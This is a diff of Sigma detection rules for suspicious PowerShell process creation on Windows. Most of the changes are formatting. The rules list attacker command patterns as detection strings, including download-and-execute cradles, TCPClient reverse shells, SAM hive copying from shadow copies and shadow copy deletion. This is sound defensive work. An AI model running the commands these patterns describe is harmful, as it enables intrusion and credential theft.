b/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml @@ -1,8 +1,8 @@ title: MSExchange Transport Agent Installation id: 83809e84-4475-4b69-bc3e-4aad8568612f related: - - id: 83809e84-4475-4b69-bc3e-4aad8568612f - type: similar + - id: 83809e84-4475-4b69-bc3e-4aad8568612f + type: similar status: test description: Detects the Installation of a Exchange Transport Agent references: @@ -21,12 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: Install-TransportAgent + CommandLine|contains: Install-TransportAgent condition: process_creation and selection fields: - AssemblyPath falsepositives: - - Legitimate installations of exchange TransportAgents. AssemblyPath is a good - indicator for this. + - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml index 428a783e6..a17f4d5d4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml @@ -1,8 +1,7 @@ title: Non Interactive PowerShell Process Spawned id: f4bbd493-b796-416e-bbf2-121235348529 status: test -description: Detects non-interactive PowerShell activity by looking at the "powershell" - process with a non-user GUI process such as "explorer.exe" as a parent. +description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. references: - https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll filter_main_generic: ParentProcessName|endswith: - :\Windows\explorer.exe @@ -33,16 +32,14 @@ detection: filter_main_windows_update: ParentProcessName: :\$WINDOWS.~BT\Sources\SetupHost.exe filter_optional_vscode: + # Triggered by VsCode when you open a Shell inside the workspace ParentCommandLine|contains: ' --ms-enable-electron-run-as-node ' ParentProcessName|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe filter_optional_terminal: ParentProcessName|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal_ ParentProcessName|endswith: \WindowsTerminal.exe - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB - scripts which may trigger this rule often. It is best to add additional filters - or use this to hunt for anomalies + - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml index 6384d524a..79a91eb6b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: (WCHAR)0x + CommandLine|contains: (WCHAR)0x condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml index 9638b9a61..7bb085f25 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_public_folder.yml @@ -1,8 +1,7 @@ title: Execution of Powershell Script in Public Folder id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4 status: test -description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" - folder +description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder references: - https://www.mandiant.com/resources/evolution-of-fin7 author: Max Altgelt (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - -f C:\Users\Public - -f "C:\Users\Public - -f %Public% @@ -32,7 +31,7 @@ detection: - -file C:\Users\Public - -file "C:\Users\Public - -file %Public% - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml index 49430b1c6..fa33a34b6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml @@ -1,16 +1,14 @@ title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 related: - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: test -description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" - which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom - PowerShell code via module load-order hijacking. +description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -28,7 +26,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Invoke-ATHRemoteFXvGPUDisablementCommand - Invoke-ATHRemoteFXvGPUDisableme condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml index e3e3a8470..df0235cfb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml @@ -1,9 +1,7 @@ title: Potential Powershell ReverseShell Connection id: edc2f8ae-2412-4dfd-b9d5-0c57727e70be status: stable -description: Detects usage of the "TcpClient" class. Which can be abused to establish - remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" - reverse shell and other. +description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -22,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' Net.Sockets.TCPClient' - .GetStream( - .Write( diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml index 574188065..a3c3459e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml @@ -18,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Get-Content - -Stream ParentProcessName|endswith: - \powershell.exe - \pwsh.exe - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml index 9f011ae8d..a2bb2235b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|re: \s-\s*< - NewProcessName|endswith: + CommandLine|re: \s-\s*< + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml index 323187517..bd0923b17 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_sam_access.yml @@ -18,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - \HarddiskVolumeShadowCopy - System32\config\sam selection_2: - CommandLine|contains: + CommandLine|contains: - Copy-Item - cp $_. - cpi $_. diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml index d9461e6af..0275040ed 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Invocation From Script Engines id: 95eadcb2-92e4-4ed1-9031-92547773a6db status: test -description: Detects suspicious powershell invocations from interpreters or unusual - programs +description: Detects suspicious powershell invocations from interpreters or unusual programs references: - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/ author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: ParentProcessName|endswith: - \wscript.exe - \cscript.exe - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe filter_health_service: diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml index e984b4b89..7233364d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml @@ -1,12 +1,10 @@ title: Suspicious Service DACL Modification Via Set-Service Cmdlet id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: derived + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 + type: derived status: test -description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using - the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can - be used to hide services or make them unstopable +description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings @@ -23,17 +21,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - NewProcessName|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl_flag: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' selection_set_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Service ' - D;; - CommandLine|contains: + CommandLine|contains: - ;;;IU - ;;;SU - ;;;BA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml index d57d4b2f4..7693c60ca 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl.yml @@ -1,12 +1,12 @@ title: PowerShell Script Change Permission Via Set-Acl id: bdeb2cff-af74-4094-8426-724dc937f20a related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: test description: Detects PowerShell execution to set the ACL of a file or a folder references: @@ -24,14 +24,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_cmdlet: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Acl ' - '-AclObject ' - '-Path ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml index eaba1abc0..fd9d99e0f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml @@ -1,12 +1,12 @@ title: PowerShell Set-Acl On Windows Folder -id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 +id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: test description: Detects PowerShell scripts to set the ACL to a file in the Windows folder references: @@ -24,24 +24,26 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_cmdlet: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Acl ' - '-AclObject ' selection_paths: - CommandLine|contains: + # Note: Add more suspicious paths + CommandLine|contains: - -Path "C:\Windows - -Path 'C:\Windows - -Path %windir% - -Path $env:windir selection_permissions: - CommandLine|contains: + # Note: Add more suspicious permissions + CommandLine|contains: - FullControl - Allow condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml index b752b85d1..c4a8dcdb5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml @@ -1,15 +1,14 @@ title: Change PowerShell Policies to an Insecure Level id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # ScriptBlock + type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry + type: similar status: test -description: Detects changing the PowerShell script execution policy to a potentially - insecure level using the "-ExecutionPolicy" flag. +description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 @@ -29,19 +28,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_option: - CommandLine|contains: + CommandLine|contains: - '-executionpolicy ' - ' -ep ' - ' -exec ' selection_level: - CommandLine|contains: + CommandLine|contains: - Bypass - Unrestricted condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml index 0f8034277..135df146f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via PowerShell Set-Service id: 62b20d44-1546-4e61-afce-8e175eb9473c status: test -description: Detects the use of the PowerShell "Set-Service" cmdlet to change the - startup type of a service to "disabled" or "manual" +description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \powershell.exe - - OriginalFileName: PowerShell.EXE + - NewProcessName|endswith: \powershell.exe + - OriginalFileName: PowerShell.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - Set-Service - -StartupType - CommandLine|contains: + CommandLine|contains: - Disabled - Manual condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml index 221944403..89c79f0b7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml @@ -1,14 +1,12 @@ title: Deletion of Volume Shadow Copies via WMI with PowerShell id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 related: - - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e - type: derived - - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 - type: similar + - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e + type: derived + - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 + type: similar status: test -description: Detects deletion of Windows Volume Shadow Copies with PowerShell code - and Get-WMIObject. This technique is used by numerous ransomware families such - as Sodinokibi/REvil +description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html @@ -26,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_get: - CommandLine|contains: + CommandLine|contains: - Get-WmiObject - gwmi - Get-CimInstance - gcim selection_shadowcopy: - CommandLine|contains: Win32_Shadowcopy + CommandLine|contains: Win32_Shadowcopy selection_delete: - CommandLine|contains: + CommandLine|contains: - .Delete() - Remove-WmiObject - rwmi diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml index c887f5c32..61e2e3060 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml @@ -1,8 +1,7 @@ title: Exchange PowerShell Snap-Ins Usage id: 25676e10-2121-446e-80a4-71ff8506af47 status: experimental -description: Detects adding and using Exchange PowerShell snap-ins to export mailbox - data. As seen used by HAFNIUM and APT27 +description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -23,21 +22,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: Add-PSSnapin + CommandLine|contains: Add-PSSnapin selection_module: - CommandLine|contains: + CommandLine|contains: - Microsoft.Exchange.Powershell.Snapin - Microsoft.Exchange.Management.PowerShell.SnapIn filter_msiexec: - CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) - -ErrorVariable exerr 2> $null + # ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000 + CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null ParentProcessName: C:\Windows\System32\msiexec.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml index c0c294371..580c76263 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via PowerShell Stop-Service id: c49c5062-0966-4170-9efd-9968c913a6cf related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -18,17 +18,16 @@ detection: EventID: 4688 Channel: Security selection_sc_net_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_cli: - CommandLine|contains: 'Stop-Service ' + CommandLine|contains: 'Stop-Service ' condition: process_creation and (all of selection_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml index 4109e2221..93bd1fcad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml @@ -22,7 +22,7 @@ detection: - \powershell_ise.exe - \powershell.exe - \pwsh.exe - NewProcessName|endswith: + NewProcessName|endswith: - \bash.exe - \bitsadmin.exe - \certutil.exe @@ -39,12 +39,10 @@ detection: - \wmic.exe - \wscript.exe filter_optional_amazon: - ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ - CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ + ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces + CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - - Some false positive is to be expected from PowerShell scripts that might make - use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional - filters for those scripts when needed. + - Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed. level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml index bf1fa5bcd..8c590de71 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml @@ -1,12 +1,10 @@ title: Suspicious PowerShell Download and Execute Pattern id: e6c54d94-498c-4562-a37c-b469d8e9a275 related: - - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 - type: derived + - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 + type: derived status: test -description: Detects suspicious PowerShell download patterns that are often used in - malicious scripts, stagers or downloaders (make sure that your backend applies - the strings case-insensitive) +description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) references: - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html @@ -24,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: # make sure that your backend applies the strings case-insensitive - IEX ((New-Object Net.WebClient).DownloadString - IEX (New-Object Net.WebClient).DownloadString - IEX((New-Object Net.WebClient).DownloadString diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml index 0e66f9762..556abf4d3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml @@ -4,8 +4,7 @@ status: test description: Detects suspicious PowerShell invocation with a parameter substring references: - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier -author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez - (Fix) +author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) date: 2019/01/16 modified: 2022/07/14 tags: @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -windowstyle h ' - ' -windowstyl h' - ' -windowsty h' @@ -128,7 +127,7 @@ detection: - ' /exe bypass' - ' /ex bypass' - ' /ep bypass' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml index 2cd3a3684..94ac40405 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Parent Process id: 754ed792-634f-40ae-b3bc-e0448d33f695 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: derived + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: derived status: test description: Detects a suspicious or uncommon parent processes of PowerShell references: @@ -21,43 +21,43 @@ detection: EventID: 4688 Channel: Security selection_parent: - - ParentProcessName|contains: tomcat - - ParentProcessName|endswith: - - \amigo.exe - - \browser.exe - - \chrome.exe - - \firefox.exe - - \httpd.exe - - \iexplore.exe - - \jbosssvc.exe - - \microsoftedge.exe - - \microsoftedgecp.exe - - \MicrosoftEdgeSH.exe - - \mshta.exe - - \nginx.exe - - \outlook.exe - - \php-cgi.exe - - \regsvr32.exe - - \rundll32.exe - - \safari.exe - - \services.exe - - \sqlagent.exe - - \sqlserver.exe - - \sqlservr.exe - - \vivaldi.exe - - \w3wp.exe + - ParentProcessName|contains: tomcat + - ParentProcessName|endswith: + - \amigo.exe + - \browser.exe + - \chrome.exe + - \firefox.exe + - \httpd.exe + - \iexplore.exe + - \jbosssvc.exe + - \microsoftedge.exe + - \microsoftedgecp.exe + - \MicrosoftEdgeSH.exe + - \mshta.exe + - \nginx.exe + - \outlook.exe + - \php-cgi.exe + - \regsvr32.exe + - \rundll32.exe + - \safari.exe + - \services.exe + - \sqlagent.exe + - \sqlserver.exe + - \sqlservr.exe + - \vivaldi.exe + - \w3wp.exe selection_powershell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - CommandLine|contains: - - /c powershell - - /c pwsh - - Description: Windows 